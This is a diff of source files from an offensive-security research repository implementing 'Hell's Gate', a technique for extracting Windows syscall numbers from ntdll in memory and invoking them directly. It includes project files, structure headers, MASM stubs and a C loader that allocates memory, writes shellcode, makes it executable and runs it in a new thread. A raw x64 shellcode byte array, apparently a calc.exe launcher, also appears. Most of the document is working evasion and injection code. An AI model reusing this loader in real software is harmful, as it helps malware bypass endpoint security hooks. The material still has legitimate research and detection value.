||||
IMAGE_OPTIONAL_HEADER64 ends
|
||||
|
||||
IMAGE_NT_HEADERS64 struct
|
||||
Signature DWORD ? ; 0x0000
|
||||
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
|
||||
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
|
||||
IMAGE_NT_HEADERS64 ends
|
||||
|
||||
IMAGE_EXPORT_DIRECTORY struct
|
||||
Characteristics DWORD ? ; 0x0000
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
MajorVersion WORD ? ; 0x0008
|
||||
MinorVersion WORD ? ; 0x000A
|
||||
_Name DWORD ? ; 0x000C
|
||||
Base DWORD ? ; 0x0010
|
||||
NumberOfFunctions DWORD ? ; 0x0014
|
||||
NumberOfNames DWORD ? ; 0x0018
|
||||
AddressOfFunctions DWORD ? ; 0x001C
|
||||
AddressOfNames DWORD ? ; 0x0020
|
||||
AddressOfNameOrdinals DWORD ? ; 0x0024
|
||||
IMAGE_EXPORT_DIRECTORY ends
|
42
VXUG-Papers/Hells Gate/Assembly Expansion/main.c
Normal file
42
VXUG-Papers/Hells Gate/Assembly Expansion/main.c
Normal file
|
@ -0,0 +1,42 @@
|
|||
/**
|
||||
* @file main.c
|
||||
* @data 07-08-2020
|
||||
* @author Paul Laîné(@am0nsec)
|
||||
* @version 1.0
|
||||
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
|
||||
* @details
|
||||
* @link https ://ntamonsec.blogspot.com/
|
||||
* @copyright This project has been released under the GNU Public License v3 license.
|
||||
*/
|
||||
#include <Windows.h>
|
||||
|
||||
unsigned char Shellcode[] =
|
||||
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
|
||||
"\x63\x2e\x65\x78\x65\x00";
|
||||
|
||||
DWORD ShellcodeLength = sizeof(Shellcode);
|
||||
|
||||
extern BOOL HellsGate(void);
|
||||
|
||||
INT wmain() {
|
||||
|
||||
BOOL a = HellsGate();
|
||||
|
||||
}
|
31
VXUG-Papers/Hells Gate/C Implementation/HellsGate.sln
Normal file
31
VXUG-Papers/Hells Gate/C Implementation/HellsGate.sln
Normal file
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30114.105
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,161 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
|
||||
<RootNamespace>HellsGate</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="structs.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<MASM Include="hellsgate.asm">
|
||||
<FileType>Document</FileType>
|
||||
</MASM>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="structs.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<MASM Include="hellsgate.asm">
|
||||
<Filter>Source Files</Filter>
|
||||
</MASM>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
; Hell's Gate
|
||||
; Dynamic system call invocation
|
||||
;
|
||||
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
|
||||
|
||||
.data
|
||||
wSystemCall DWORD 000h
|
||||
|
||||
.code
|
||||
HellsGate PROC
|
||||
mov wSystemCall, 000h
|
||||
mov wSystemCall, ecx
|
||||
ret
|
||||
HellsGate ENDP
|
||||
|
||||
HellDescent PROC
|
||||
mov r10, rcx
|
||||
mov eax, wSystemCall
|
||||
|
||||
syscall
|
||||
ret
|
||||
HellDescent ENDP
|
||||
end
|
211
VXUG-Papers/Hells Gate/C Implementation/HellsGate/main.c
Normal file
211
VXUG-Papers/Hells Gate/C Implementation/HellsGate/main.c
Normal file
|
@ -0,0 +1,211 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include "structs.h"
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
VX Tables
|
||||
--------------------------------------------------------------------*/
|
||||
typedef struct _VX_TABLE_ENTRY {
|
||||
PVOID pAddress;
|
||||
DWORD64 dwHash;
|
||||
WORD wSystemCall;
|
||||
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
|
||||
|
||||
typedef struct _VX_TABLE {
|
||||
VX_TABLE_ENTRY NtAllocateVirtualMemory;
|
||||
VX_TABLE_ENTRY NtProtectVirtualMemory;
|
||||
VX_TABLE_ENTRY NtCreateThreadEx;
|
||||
VX_TABLE_ENTRY NtWaitForSingleObject;
|
||||
} VX_TABLE, * PVX_TABLE;
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
Function prototypes.
|
||||
--------------------------------------------------------------------*/
|
||||
PTEB RtlGetThreadEnvironmentBlock();
|
||||
BOOL GetImageExportDirectory(
|
||||
_In_ PVOID pModuleBase,
|
||||
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
|
||||
);
|
||||
BOOL GetVxTableEntry(
|
||||
_In_ PVOID pModuleBase,
|
||||
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
|
||||
_In_ PVX_TABLE_ENTRY pVxTableEntry
|
||||
);
|
||||
BOOL Payload(
|
||||
_In_ PVX_TABLE pVxTable
|
||||
);
|
||||
PVOID VxMoveMemory(
|
||||
_Inout_ PVOID dest,
|
||||
_In_ const PVOID src,
|
||||
_In_ SIZE_T len
|
||||
);
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
External functions' prototype.
|
||||
--------------------------------------------------------------------*/
|
||||
extern VOID HellsGate(WORD wSystemCall);
|
||||
extern HellDescent();
|
||||
|
||||
INT wmain() {
|
||||
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
|
||||
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
|
||||
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
|
||||
return 0x1;
|
||||
|
||||
// Get NTDLL module
|
||||
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
|
||||
|
||||
// Get the EAT of NTDLL
|
||||
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
|
||||
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
|
||||
return 0x01;
|
||||
|
||||
VX_TABLE Table = { 0 };
|
||||
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
|
||||
return 0x1;
|
||||
|
||||
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
|
||||
return 0x1;
|
||||
|
||||
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
|
||||
return 0x1;
|
||||
|
||||
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
|
||||
return 0x1;
|
||||
|
||||
Payload(&Table);
|
||||
return 0x00;
|
||||
}
|
||||
|
||||
PTEB RtlGetThreadEnvironmentBlock() {
|
||||
#if _WIN64
|
||||
return (PTEB)__readgsqword(0x30);
|
||||
#else
|
||||
return (PTEB)__readfsdword(0x16);
|
||||
#endif
|
||||
}
|
||||
|
||||
DWORD64 djb2(PBYTE str) {
|
||||
DWORD64 dwHash = 0x7734773477347734;
|
||||
INT c;
|
||||
|
||||
while (c = *str++)
|
||||
dwHash = ((dwHash << 0x5) + dwHash) + c;
|
||||
|
||||
return dwHash;
|
||||
}
|
||||
|
||||
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
|
||||
// Get DOS header
|
||||
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
|
||||
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Get NT headers
|
||||
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
|
||||
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Get the EAT
|
||||
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
|
||||
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
|
||||
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
|
||||
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
|
||||
|
||||
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
|
||||
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
|
||||
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
|
||||
|
||||
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
|
||||
pVxTableEntry->pAddress = pFunctionAddress;
|
||||
|
||||
// Quick and dirty fix in case the function has been hooked
|
||||
WORD cw = 0;
|
||||
while (TRUE) {
|
||||
// check if syscall, in this case we are too far
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
|
||||
return FALSE;
|
||||
|
||||
// check if ret, in this case we are also probaly too far
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
|
||||
return FALSE;
|
||||
|
||||
// First opcodes should be :
|
||||
// MOV R10, RCX
|
||||
// MOV RCX, <syscall>
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
|
||||
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
|
||||
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
|
||||
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
|
||||
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
|
||||
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
|
||||
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
|
||||
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
|
||||
pVxTableEntry->wSystemCall = (high << 8) | low;
|
||||
break;
|
||||
}
|
||||
|
||||
cw++;
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL Payload(PVX_TABLE pVxTable) {
|
||||
NTSTATUS status = 0x00000000;
|
||||
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
|
||||
|
||||
// Allocate memory for the shellcode
|
||||
PVOID lpAddress = NULL;
|
||||
SIZE_T sDataSize = sizeof(shellcode);
|
||||
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
|
||||
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
|
||||
|
||||
// Write Memory
|
||||
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
|
||||
|
||||
// Change page permissions
|
||||
ULONG ulOldProtect = 0;
|
||||
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
|
||||
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
|
||||
|
||||
// Create thread
|
||||
HANDLE hHostThread = INVALID_HANDLE_VALUE;
|
||||
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
|
||||
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
|
||||
|
||||
// Wait for 1 seconds
|
||||
LARGE_INTEGER Timeout;
|
||||
Timeout.QuadPart = -10000000;
|
||||
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
|
||||
status = HellDescent(hHostThread, FALSE, &Timeout);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
|
||||
char* d = dest;
|
||||
const char* s = src;
|
||||
if (d < s)
|
||||
while (len--)
|
||||
*d++ = *s++;
|
||||
else {
|
||||
char* lasts = s + (len - 1);
|
||||
char* lastd = d + (len - 1);
|
||||
while (len--)
|
||||
*lastd-- = *lasts--;
|
||||
}
|
||||
return dest;
|
||||
}
|
337
VXUG-Papers/Hells Gate/C Implementation/HellsGate/structs.h
Normal file
337
VXUG-Papers/Hells Gate/C Implementation/HellsGate/structs.h
Normal file
|
@ -0,0 +1,337 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
STRUCTURES
|
||||
--------------------------------------------------------------------*/
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
|
||||
|
||||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
||||
|
||||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||
|
||||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PVOID ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
